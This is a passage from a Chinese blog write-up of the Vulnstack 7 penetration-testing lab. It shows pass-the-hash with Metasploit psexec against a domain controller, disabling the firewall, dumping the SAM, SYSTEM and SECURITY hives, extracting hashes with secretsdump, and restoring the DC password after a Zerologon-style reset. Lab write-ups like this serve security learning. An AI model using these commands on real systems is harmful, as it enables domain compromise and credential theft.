<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;windows&#x2F;smb&#x2F;psexec</span><br><span class="line">set SMBUser administrator</span><br><span class="line">set SMBPass aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec</span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;bind_tcp</span><br><span class="line">set rhost 192.168.93.30</span><br><span class="line">run&#x2F;exploit</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/48.png"></p>
<p>但是并没有返回会话，估计是防火墙的原因，使用MS17010命令执行模块进行关闭</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall set allprofiles state off</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/67.png"></p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/50.png"></p>
<p>上线成功</p>
<h3 id="恢复域控Hash"><a href="#恢复域控Hash" class="headerlink" title="恢复域控Hash"></a>恢复域控Hash</h3><p><strong>重点：一定恢复域控hash，不然会导致脱域</strong></p>
<p>执行以下命令，获取目标原始hash</p>
<p>使用msf进行生成</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SYSTEM system.save</span><br><span class="line">reg save HKLM\SAM sam.save</span><br><span class="line">reg save HKLM\SECURITY security.save</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/53.png"></p>
<p>下载到Kali中</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/54.png"></p>
<p>下载完成之后进行删除</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">del &#x2F;f system.save</span><br><span class="line">del &#x2F;f sam.save</span><br><span class="line">del &#x2F;f security.save</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/59.png"></p>
<p>查看域控hash</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/57.png"></p>
<p>使用脚本恢复hash</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains python3 reinstall_original_pw.py DC 192.168.93.30 7fd0cca5eafe480f617b04039bbf115c</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/55.png"></p>
<p>使用空密码连接进行验证是否恢复</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/58.png"></p>
<p>成功恢复</p>
<h1 id="结言"><a href="#结言" class="headerlink" title="结言"></a>结言</h1><p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/60.png"></p>
<p>明明已经开启了，不知道为什么PC 1扫描存活的时候就是扫不出来，网卡也是设置一样的，利用DC也访问不到~~~</p>
<p>最终拿下机器如下</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/51.png"></p>
<p>权限维持就不做了，写完文章也挺晚了~~~</p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
    
      <a href="/2021/05/09/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">PHP反序列化</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "",
    app_key: "",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2020-2021
        <i class="ri-heart-fill heart_icon"></i> John Doe
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/logo.png" alt="回梦&#39;s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


    
  </div>
</body>

</html>